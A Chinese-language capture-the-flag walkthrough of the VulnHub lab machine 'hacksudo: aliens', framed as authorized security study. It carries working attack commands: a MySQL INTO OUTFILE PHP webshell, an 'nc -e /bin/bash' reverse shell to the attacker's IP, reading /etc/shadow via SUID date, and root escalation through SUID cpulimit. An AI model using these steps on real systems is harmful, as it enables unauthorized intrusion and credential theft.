vulhub系列-84-hacksudo: aliens(超详细)

免责声明：本文记录的是 hacksudo: aliens 渗透测试靶机 的解题过程，所有操作均在 本地授权环境 中进行。内容仅供 网络安全学习与防护研究 使用，请勿用于任何非法用途。读者应遵守《网络安全法》及相关法律法规，自觉维护网络空间安全。

环境： https://download.vulnhub.com/hacksudo/HacksudoAliens.zip

一、信息收集

1、探测目标IP地址

arp-scan -l #探测当前网段的所有ip地址

┌──(root㉿kali)-[~] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 08:00:27:63:b0:05, IPv4: 192.168.5.6 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.5.1 0a:00:27:00:00:04 (Unknown: locally administered) 192.168.5.2 08:00:27:99:09:f8 PCS Systemtechnik GmbH 192.168.5.12 08:00:27:9e:8e:c4 PCS Systemtechnik GmbH ​ 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.958 seconds (130.75 hosts/sec). 3 responded

nmap -sP 192.168.5.0/24

┌──(root㉿kali)-[~] └─# nmap -sP 192.168.5.0/24 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-25 08:25 -0400 Nmap scan report for 192.168.5.1 Host is up (0.00015s latency). MAC Address: 0A:00:27:00:00:04 (Unknown) Nmap scan report for 192.168.5.2 Host is up (0.00015s latency). MAC Address: 08:00:27:99:09:F8 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.5.12 Host is up (0.00012s latency). MAC Address: 08:00:27:9E:8E:C4 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.5.6 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 9.94 seconds

目标IP：192.168.5.12

2、探测目标IP开放端口

nmap -sV -p- 192.168.5.12

┌──(root㉿kali)-[~] └─# nmap -sV -p- 192.168.5.12 Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-25 08:25 -0400 Nmap scan report for 192.168.5.12 Host is up (0.000070s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) 9000/tcp open http Apache httpd 2.4.38 ((Debian)) MAC Address: 08:00:27:9E:8E:C4 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ​ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.34 seconds

端口：22、80、9000

3、目录探测

dirsearch -u http://192.168.5.12

┌──(root㉿kali)-[~] └─# dirsearch -u http://192.168.5.12 /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html from pkg_resources import DistributionNotFound, VersionConflict _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /root/reports/http_192.168.5.12/_26-03-25_08-26-38.txt Target: http://192.168.5.12/ [08:26:38] Starting: [08:26:39] 403 - 277B - /.ht_wsr.txt [08:26:39] 403 - 277B - /.htaccess.bak1 [08:26:39] 403 - 277B - /.htaccess.save [08:26:39] 403 - 277B - /.htaccess.sample [08:26:39] 403 - 277B - /.htaccess.orig [08:26:39] 403 - 277B - /.htaccess_extra [08:26:39] 403 - 277B - /.htaccess_orig [08:26:39] 403 - 277B - /.htaccess_sc [08:26:39] 403 - 277B - /.htaccessBAK [08:26:39] 403 - 277B - /.htaccessOLD2 [08:26:39] 403 - 277B - /.htaccessOLD [08:26:39] 403 - 277B - /.htm [08:26:39] 403 - 277B - /.html [08:26:39] 403 - 277B - /.htpasswds [08:26:39] 403 - 277B - /.httr-oauth [08:26:39] 403 - 277B - /.php [08:26:41] 403 - 277B - /.htpasswd_test [08:26:47] 301 - 313B - /backup -> http://192.168.5.12/backup/ [08:26:47] 200 - 458B - /backup/ [08:26:52] 200 - 17KB - /favicon.ico [08:26:54] 301 - 313B - /images -> http://192.168.5.12/images/ [08:26:54] 200 - 456B - /images/ [08:27:02] 200 - 16B - /README.md [08:27:04] 403 - 277B - /server-status/ [08:27:04] 403 - 277B - /server-status Task Completed

二、漏洞利用

1、信息搜集

/backup 目录

http://192.168.5.12/backup/

#!/bin/bash # Specify which database is to be backed up db_name="" # Set the website which this database relates to website="localhost" # Database credentials user="vishal" password="hacksudo" host="localhost" # How many days would you like to keep files for? days="30" ###################################################### ##### EDITING BELOW MAY CAUSE UNEXPECTED RESULTS ##### ###################################################### # Set the date date=$(date +"%Y%m%d-%H%M") # Set the location of where backups will be stored backup_location="/var/backups/mysql" # Create the directory for the website if it doesn't already exist mkdir -p ${backup_location}/${website} # Append the database name with the date to the backup location backup_full_name="${backup_location}/${website}/${db_name}-${date}.sql" # Set default file permissions umask 177 # Dump database into SQL file mysqldump --lock-tables --user=$user --password=$password --host=$host $db_name > $backup_full_name # Set a value to be used to find all backups with the same name find_backup_name="${backup_location}/${website}/${db_name}-*.sql" # Delete files older than the number of days defined find $find_backup_name -mtime +$days -type f -delete

发现了数据库的用户名和密码：

**user="vishal" password="hacksudo"**

9000端口

http://192.168.5.12:9000/

使用数据库的用户名和密码登录

登录成功：

2、webshell

使用sql写入一句话木马

SELECT "<?php system($_GET['sain']); ?>" INTO OUTFILE "/var/www/html/shell.php"

写入成功：

3、getshell

访问webshell

http://192.168.5.12/shell.php

验证成功：

利用 nc 反弹 shell并本地监听：

nc -e /bin/bash 192.168.5.6 1234

反弹成功：

┌──(root㉿kali)-[~] └─# nc -lvnp 1234 listening on [any] 1234 ... connect to [192.168.5.6] from (UNKNOWN) [192.168.5.12] 51432 id uid=33(www-data) gid=33(www-data) groups=33(www-data)

三、权限提升

1、切换bash下shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

python3 -c 'import pty; pty.spawn("/bin/bash")' www-data@hacksudo:/var/www/html$

2、查看权限和SUID文件

find / -perm -u=s -type f 2>/dev/null

www-data@hacksudo:/var/www/html$ find / -perm -u=s -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null /usr/bin/date /usr/bin/pkexec /usr/bin/passwd /usr/bin/chfn /usr/bin/chsh /usr/bin/umount /usr/bin/newgrp /usr/bin/fusermount /usr/bin/gpasswd /usr/bin/mount /usr/bin/su /usr/bin/ntfs-3g /usr/bin/bwrap /usr/bin/sudo /usr/lib/xorg/Xorg.wrap /usr/lib/openssh/ssh-keysign /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/sbin/pppd www-data@hacksudo:/var/www/html$

发现可以用 date，date 可以越权查看文件：

date -f /etc/shadow

www-data@hacksudo:/var/www/html$ date -f /etc/shadow date -f /etc/shadow date: invalid date ‘root:$6$N6p.dpWhPYXSXC9U$8EraUiQ5DtMF5ov2ZbnY8DoLK1liRukqhTnTTK67MQ.tgpglkVX/I9P1aYjNeO/cwjQk9lJ/ABd9YLTMeMSn3/:18721:0:99999:7:::’ date: invalid date ‘daemon:*:18714:0:99999:7:::’ date: invalid date ‘bin:*:18714:0:99999:7:::’ date: invalid date ‘sys:*:18714:0:99999:7:::’ date: invalid date ‘sync:*:18714:0:99999:7:::’ date: invalid date ‘games:*:18714:0:99999:7:::’ date: invalid date ‘man:*:18714:0:99999:7:::’ date: invalid date ‘lp:*:18714:0:99999:7:::’ date: invalid date ‘mail:*:18714:0:99999:7:::’ date: invalid date ‘news:*:18714:0:99999:7:::’ date: invalid date ‘uucp:*:18714:0:99999:7:::’ date: invalid date ‘proxy:*:18714:0:99999:7:::’ date: invalid date ‘www-data:*:18714:0:99999:7:::’ date: invalid date ‘backup:*:18714:0:99999:7:::’ date: invalid date ‘list:*:18714:0:99999:7:::’ date: invalid date ‘irc:*:18714:0:99999:7:::’ date: invalid date ‘gnats:*:18714:0:99999:7:::’ date: invalid date ‘nobody:*:18714:0:99999:7:::’ date: invalid date ‘_apt:*:18714:0:99999:7:::’ date: invalid date ‘systemd-timesync:*:18714:0:99999:7:::’ date: invalid date ‘systemd-network:*:18714:0:99999:7:::’ date: invalid date ‘systemd-resolve:*:18714:0:99999:7:::’ date: invalid date ‘messagebus:*:18714:0:99999:7:::’ date: invalid date ‘tss:*:18714:0:99999:7:::’ date: invalid date ‘dnsmasq:*:18714:0:99999:7:::’ date: invalid date ‘usbmux:*:18714:0:99999:7:::’ date: invalid date ‘rtkit:*:18714:0:99999:7:::’ date: invalid date ‘pulse:*:18714:0:99999:7:::’ date: invalid date ‘speech-dispatcher:!:18714:0:99999:7:::’ date: invalid date ‘avahi:*:18714:0:99999:7:::’ date: invalid date ‘saned:*:18714:0:99999:7:::’ date: invalid date ‘colord:*:18714:0:99999:7:::’ date: invalid date ‘geoclue:*:18714:0:99999:7:::’ date: invalid date ‘hplip:*:18714:0:99999:7:::’ date: invalid date ‘Debian-gdm:*:18714:0:99999:7:::’ date: invalid date ‘hacksudo:$6$cOv4E/VKAe0EVwV4$YScCx10zfi7g4aiLY.qo8QPm2iOogJea41mk2rGk/0JM5AtnrmiyTN5ctNJ0KTLS5Iru4lHWYPug792u3L/Um1:18721:0:99999:7:::’ date: invalid date ‘systemd-coredump:!!:18714::::::’ date: invalid date ‘sshd:*:18714:0:99999:7:::’ date: invalid date ‘mysql:!:18720:0:99999:7:::’ www-data@hacksudo:/var/www/html$

得到hacksudo用户的密码哈希值：

$6$cOv4E/VKAe0EVwV4$YScCx10zfi7g4aiLY.qo8QPm2iOogJea41mk2rGk/0JM5AtnrmiyTN5ctNJ0KTLS5Iru4lHWYPug792u3L/Um1

3、密码爆破

john hash --wordlist=/usr/share/wordlists/rockyou.txt

┌──(root㉿kali)-[~] └─# john hash --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status aliens (?) 1g 0:00:00:02 DONE (2026-03-25 08:37) 0.4878g/s 3746p/s 3746c/s 3746C/s pheonix..thesimpsons Use the "--show" option to display all of the cracked passwords reliably Session completed.

hacksudo的密码一下就出来了：aliens，那就 ssh 登录：

ssh hacksudo@192.168.5.12 密码：**aliens**

┌──(root㉿kali)-[~] └─# ssh hacksudo@192.168.5.12 The authenticity of host '192.168.5.12 (192.168.5.12)' can't be established. ED25519 key fingerprint is: SHA256:XUlS4R9GczG8s3rLmHyLIacottCV5nGnO/wvGzLMtXQ This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.5.12' (ED25519) to the list of known hosts. ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to "store now, decrypt later" attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html hacksudo@192.168.5.12's password: Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Apr 4 02:12:24 2021 from 192.168.43.217 hacksudo@hacksudo:~$

4、查看权限和 SUID 文件

hacksudo@hacksudo:~$ find / -perm -u=s -type f 2>/dev/null /home/hacksudo/Downloads/cpulimit /usr/bin/date /usr/bin/pkexec /usr/bin/passwd /usr/bin/chfn /usr/bin/chsh /usr/bin/umount /usr/bin/newgrp /usr/bin/fusermount /usr/bin/gpasswd /usr/bin/mount /usr/bin/su /usr/bin/ntfs-3g /usr/bin/bwrap /usr/bin/sudo /usr/lib/xorg/Xorg.wrap /usr/lib/openssh/ssh-keysign /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/sbin/pppd hacksudo@hacksudo:~$

有个二进制文件比较可疑。查看一下：

cd /home/hacksudo/Downloads/ ./cpulimit -h

hacksudo@hacksudo:~$ cd /home/hacksudo/Downloads/ hacksudo@hacksudo:~/Downloads$ hacksudo@hacksudo:~/Downloads$ ./cpulimit -h CPUlimit version 2.4 Usage: ./cpulimit TARGET [OPTIONS...] [-- PROGRAM] TARGET must be exactly one of these: -p, --pid=N pid of the process -e, --exe=FILE name of the executable program file The -e option only works when cpulimit is run with admin rights. -P, --path=PATH absolute path name of the executable program file OPTIONS -b --background run in background -f --foreground launch target process in foreground and wait for it to exit -c --cpu=N override the detection of CPUs on the machine. -l, --limit=N percentage of cpu allowed from 1 up. Usually 1 - 100, but can be higher on multi-core CPUs (mandatory) -m, --monitor-forks Watch children/forks of the target process -q, --quiet run in quiet mode (only print errors). -k, --kill kill processes going over their limit instead of just throttling them. -r, --restore Restore processes after they have been killed. Works with the -k flag. -s, --signal=SIG Send this signal to the watched process when cpulimit exits. Signal should be specificed as a number or SIGTERM, SIGCONT, SIGSTOP, etc. SIGCONT is the default. -v, --verbose show control statistics -z, --lazy exit if there is no suitable target process, or if it dies -- This is the final CPUlimit option. All following options are for another program we will launch. -h, --help display this help and exit hacksudo@hacksudo:~/Downloads$

在 gtfobins 上找到了它的提权方式：

提权到 root：

./cpulimit -l 100 -f -- /bin/sh -p

hacksudo@hacksudo:~/Downloads$ ./cpulimit -l 100 -f -- /bin/sh -p Process 1481 detected # id uid=1000(hacksudo) gid=1000(hacksudo) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner),1000(hacksudo) # # whoami root #

查看 flag：

# cd /root # # ls root.txt # # cat root.txt _ _ _ _ | | | | __ _ ___| | _____ _ _ __| | ___ | |_| |/ _` |/ __| |/ / __| | | |/ _` |/ _ \ | _ | (_| | (__| <\__ \ |_| | (_| | (_) | |_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___/ _ _ _ ____ __ / \ | (_) ___ _ __ | ___| / /_ / _ \ | | |/ _ \ '_ \|___ \| '_ \ / ___ \| | | __/ | | |___) | (_) | /_/ \_\_|_|\___|_| |_|____/ \___/ ​ congratulations you rooted hacksudo alien56...!!! flag={d045e6f9feb79e94442213f9d008ac48} # ​

本文涉及的技术方法仅适用于 授权测试环境 或 合法 CTF 赛事。请勿在未授权的情况下对任何系统进行测试。安全之路，始于合规，终于责任。